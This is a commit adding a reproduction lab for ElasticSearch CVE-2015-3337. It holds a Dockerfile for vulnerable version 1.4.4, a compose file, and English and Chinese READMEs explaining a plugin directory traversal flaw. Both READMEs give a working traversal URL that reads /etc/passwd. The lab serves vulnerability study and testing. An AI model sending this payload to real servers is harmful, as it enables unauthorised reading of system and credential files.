first commit

elasticsearch/CVE-2015-3337/Dockerfile

@@ -0,0 +1,6 @@
+FROM vulhub/elasticsearch:1.4.4
+
+LABEL maintainer="phithon <root@leavesongs.com>"
+
+RUN set -ex \
+    && plugin -install mobz/elasticsearch-head

elasticsearch/CVE-2015-3337/README.md

@@ -0,0 +1,43 @@
+# ElasticSearch Plug-in Directory Traversal (CVE-2015-3337)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+ElasticSearch is a distributed, RESTful search and analytics engine.
+
+In the ElasticSearch versions before 1.4.5 and 1.5.x before 1.5.2, a directory traversal vulnerability exists in ElasticSearch's plugin functionality that allows attackers to read arbitrary files on the system.
+
+References:
+
+- <https://nvd.nist.gov/vuln/detail/CVE-2015-3337>
+- <https://github.com/elastic/elasticsearch/issues/10828>
+
+## Vulnerability Description
+
+After installing a plugin with "site" functionality, an attacker can use `../` in the plugin directory path to traverse up the directory tree, leading to arbitrary file read. ElasticSearch installations without any plugins are not affected.
+
+## Environment Setup
+
+Execute the following commands to build and start an ElasticSearch server 1.4.4:
+
+```
+docker compose build
+docker compose up -d
+```
+
+The test environment comes with a pre-installed plugin: `elasticsearch-head`, which is a web front-end for ElasticSearch. More information about this plugin can be found at: <https://github.com/mobz/elasticsearch-head>
+
+## Vulnerability Reproduction
+
+To exploit this vulnerability, send a request to read arbitrary files using directory traversal in the plugin path. For example, to read `/etc/passwd`, send a request to:
+
+```
+http://your-ip:9200/_plugin/head/../../../../../../../../../etc/passwd
+```
+
+Note: Do not access this URL directly in a browser.
+
+![](1.png)
+
+## Additional Information
+
+The head plugin provides a web interface for ElasticSearch. You can access it at `http://your-ip:9200/_plugin/head/` to interact with your ElasticSearch cluster through a graphical interface.

elasticsearch/CVE-2015-3337/README.zh-cn.md

@@ -0,0 +1,36 @@
+# ElasticSearch 插件目录穿越漏洞（CVE-2015-3337）
+
+ElasticSearch是一个分布式的RESTful搜索和分析引擎。
+
+在ElasticSearch的插件功能中存在一个目录穿越漏洞，攻击者可以利用该漏洞读取系统上的任意文件。在安装了具有"site"功能的插件后，攻击者可以通过在插件目录路径中使用`../`来遍历目录树，从而实现任意文件读取。未安装任何插件的ElasticSearch不受此漏洞影响。
+
+参考链接：
+
+- <https://nvd.nist.gov/vuln/detail/CVE-2015-3337>
+- <https://github.com/elastic/elasticsearch/issues/10828>
+
+## 环境搭建
+
+执行以下命令来启动一个1.4.4版本的ElasticSearch服务器：
+
+```
+docker compose up -d
+```
+
+测试环境默认安装了一个插件：`elasticsearch-head`，这是一个ElasticSearch的Web前端界面。关于该插件的更多信息可以在这里找到：<https://github.com/mobz/elasticsearch-head>
+
+## 漏洞复现
+
+要利用此漏洞，可以通过在插件路径中使用目录穿越来读取任意文件。例如，要读取`/etc/passwd`文件，发送如下请求：
+
+```
+http://your-ip:9200/_plugin/head/../../../../../../../../../etc/passwd
+```
+
+注意：请不要直接在浏览器中访问此URL。
+
+![](1.png)
+
+## 补充信息
+
+head插件提供了ElasticSearch的Web界面。你可以通过访问`http://your-ip:9200/_plugin/head/`来通过图形界面与你的ElasticSearch集群进行交互。

elasticsearch/CVE-2015-3337/docker-compose.yml

@@ -0,0 +1,6 @@
+services:
+ es:
+   build: .
+   ports:
+    - "9200:9200"
+    - "9300:9300"